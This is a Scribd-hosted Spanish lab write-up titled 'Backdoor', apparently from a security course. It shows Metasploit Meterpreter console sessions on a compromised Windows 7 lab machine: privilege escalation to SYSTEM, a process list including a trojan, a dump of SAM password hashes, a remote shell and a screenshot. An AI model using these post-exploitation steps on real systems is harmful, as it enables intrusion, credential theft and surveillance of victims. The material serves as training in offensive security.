Scribd
Upload
21 views4 pages

Backdoor

The document details the steps to access information and control of a compromised Windows system using Metasploit's Meterpreter shell. It shows how to view session information, system details, current user privileges, list processes, dump password hashes, get a system shell and take a screenshot.

Uploaded by

Jesus david Martinez Avila
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
21 views4 pages

Backdoor

The document details the steps to access information and control of a compromised Windows system using Metasploit's Meterpreter shell. It shows how to view session information, system details, current user privileges, list processes, dump password hashes, get a system shell and take a screenshot.

Uploaded by

Jesus david Martinez Avila
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

1.

id de la sesion

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection


-- ---- ---- ----------- ----------
1 meterpreter x64/windows test-PC\victima @ TEST-PC 192.168.2.4:5344 ->
192.168.2.5:49320 (192.168.2.5)

2. informacion del host

meterpreter > sysinfo


Computer : TEST-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : es_CO
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >

3. informacion del usuario

meterpreter > getuid


Server username: test-PC\victima
meterpreter > getprivs

Enabled Process Privileges


==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

4. listar procesos

meterpreter >ps

Process List
============

PID PPID Name Arch Session User Path


--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
252 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \
SystemRoot\System32\smss.exe
288 464 svchost.exe x64 0 NT AUTHORITY\Servicio de red C:\
Windows\system32\svchost.exe
332 324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\system32\csrss.exe
368 360 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\
Windows\system32\csrss.exe
376 324 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\system32\wininit.exe
404 360 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\
Windows\system32\winlogon.exe
464 376 services.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\system32\services.exe
472 376 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\system32\lsass.exe
480 376 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\system32\lsm.exe
552 464 sppsvc.exe x64 0 NT AUTHORITY\Servicio de red C:\
Windows\system32\sppsvc.exe
576 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\system32\svchost.exe
644 464 svchost.exe x64 0 NT AUTHORITY\Servicio de red C:\
Windows\system32\svchost.exe
732 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
Windows\System32\svchost.exe
772 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\System32\svchost.exe
796 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\system32\svchost.exe
940 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
Windows\system32\svchost.exe
984 368 conhost.exe x64 1 test-PC\victima C:\
Windows\system32\conhost.exe
1052 464 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\System32\spoolsv.exe
1088 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
Windows\system32\svchost.exe
1148 3036 powershell.exe x64 1 test-PC\victima C:\
Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
1168 2016 explorer.exe x64 1 test-PC\victima C:\
Windows\Explorer.EXE
1200 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
Windows\system32\svchost.exe
1508 2232 powershell.exe x64 1 test-PC\victima C:\
Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1668 464 wmpnetwk.exe x64 0 NT AUTHORITY\Servicio de red C:\
Program Files\Windows Media Player\wmpnetwk.exe
1780 464 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\system32\SearchIndexer.exe
1856 3540 powershell.exe x64 1 test-PC\victima C:\
Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1968 464 taskhost.exe x64 1 test-PC\victima C:\
Windows\system32\taskhost.exe
2036 772 dwm.exe x64 1 test-PC\victima C:\
Windows\system32\Dwm.exe
2112 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\
Windows\System32\svchost.exe
2232 1148 powershell.exe x64 1 test-PC\victima C:\
Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2248 1508 cmd.exe x64 1 test-PC\victima C:\
Windows\system32\cmd.exe
2452 732 audiodg.exe x64 0
2860 1168 cmd.exe x64 1 test-PC\victima C:\
Windows\system32\cmd.exe
2892 368 conhost.exe x64 1 test-PC\victima C:\
Windows\system32\conhost.exe
3236 368 conhost.exe x64 1 test-PC\victima C:\
Windows\system32\conhost.exe
3308 368 conhost.exe x64 1 test-PC\victima C:\
Windows\system32\conhost.exe
3404 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\
Windows\System32\svchost.exe
3464 1856 powershell.exe x64 1 test-PC\victima C:\
Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3540 3780 powershell.exe x64 1 test-PC\victima C:\
Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
3780 1168 Troya.exe x64 1 test-PC\victima C:\
Users\victima\Desktop\Troya.exe

meterpreter >

5. copia de los hashes de las sam

meterpreter > hashdump


Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:1ba39fdd7b6bea2ea561ca8704d6e4
63:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
victima:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

6. iniciar shell

meterpreter > shell


Process 3916 created.
Channel 2 created.
Microsoft Windows [Versi�n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Windows\system32>cd /
cd /

C:\>dir
dir
El volumen de la unidad C no tiene etiqueta.
El n�mero de serie del volumen es: 8031-DD9E

Directorio de C:\

13/07/2009 10:20 p.m. <DIR> PerfLogs


08/05/2021 12:22 a.m. <DIR> Program Files
08/05/2021 12:23 a.m. <DIR> Program Files (x86)
08/05/2021 01:38 p.m. <DIR> Users
23/04/2021 09:02 p.m. <DIR> Windows
0 archivos 0 bytes
5 dirs 1.958.588.416 bytes libres

C:\>

7. hacer un screenshot

meterpreter > screenshot


Screenshot saved to: /home/kali/MWujvuxO.jpeg
meterpreter >

You might also like